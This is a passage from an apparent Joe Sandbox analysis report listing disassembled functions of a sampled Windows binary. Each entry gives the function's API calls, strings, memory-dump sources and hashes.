                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D518D72A0878285EB21AF219C202FBB3A0FF49B94F885135DA5D47694EF3CE555C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBE260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3849470556-1994581435
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6a9839ba33357dd56e563a3f68758b8fc04acc592805dc892b266e1666ae62be
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9516831A08B42C5EB24BF55AC642BBB6A0FF54B94F949635DA5D433A0DF7CE881C360
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706ED9A10
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706ED9994
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EDA73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA77A
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EDA73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA839
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EDA73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA850
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00007FF706ED9A62
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s$.
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3242694432-4275322459
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 657d44de7f6b5ecddd613e3e1e7a3ee861e3239897d6ce1885c906d94e02afc4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE41AF22E0974285EA10BB51AD702BBE2A1BF857A4FD85230DE5D077D6EF7CE8458320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED54B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF706ED54E6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF706ED552E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706ED758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF706ED6999,?,?,?,?,?,00007FF706EC8C39), ref: 00007FF706ED75AE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706ED758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF706ED6999,?,?,?,?,?,00007FF706EC8C39), ref: 00007FF706ED75C6
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 779401067-630742106
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c6f85b2a1a120c6f61cbc2b48ff31e8e7db16a8a4b4009d3680eff4c0e66504d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58516076A1878682EB21AB15EC207FBE361FF84784F985032EB4D4BA95DF3DD5058720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentDirectorytowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :$:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 238703822-3780739392
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 55020af0e3c8db5d59f99bfd41cd1ebab45ea734df5c727de7500f6e5232d4ca
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08113452608341C5EB25AB21AC2427BFAE0FF49BA9F858032DD4D0B790DF3CD0068724
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB58D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3677997916-3870813718
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 60251fb671124d7ef309f3ef71bf202c2e6a0c1a4cefa2fc5aa950af45a7b142
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6112576618B42C6EA109F10E85026BFBA0FB89764F805225EB8D03B68DF7DC048CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB4C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memsetwcsrchr$wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 110935159-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ad8cb5d1f8dfd0c3786098c93005beeaa8ec31532a9bca7eaf556857602ff25f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F51A322B0978685FA21AB11AC247FBA391BF49BA4F885630CE5D1B7C9DF3CE5458610
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC5EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$CurrentDirectorytowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1403193329-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0d53efbddd23589068bd85838a61717c88005a4f321dd2c70505d91d5175f593
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7851B326A0978185EB34EF20DC216BBB7A1FF48768F858135DA0D07794EF3CE5468720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB91C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00007FF706EB921C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF706EB93AA
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB8B20: wcsrchr.MSVCRT ref: 00007FF706EB8BAB
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB8B20: _wcsicmp.MSVCRT ref: 00007FF706EB8BD4
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB8B20: _wcsicmp.MSVCRT ref: 00007FF706EB8BF2
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB8B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EB8C16
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB8B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706EB8C2F
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB8B20: wcschr.MSVCRT ref: 00007FF706EB8CB3
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF706EC41AD
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF706EB92AC), ref: 00007FF706EC30CA
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3060: SetErrorMode.KERNELBASE ref: 00007FF706EC30DD
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC30F6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3060: SetErrorMode.KERNELBASE ref: 00007FF706EC3106
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00007FF706EB92D8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EB9362
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706EB9373
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3966000956-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 977ddb7334231f0fb79e58d847cc18ce7d8a205318ce9d3259cb9fa5e55b7673
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED51C632A09B8286EB61AF21DC642BBB3A4FF49B94F845135DA4D07B95DF3CE551C310
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB2A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$_setjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3883041866-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 30e3a8a30b0ae18a42ff0cb7f8434969e44d07dc626e8bcde63ec9e8a15926df
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0515C32608B868AEB619F25DC603EBB7A4FF49748F844135DA4D4BA48DF3CD645CB10
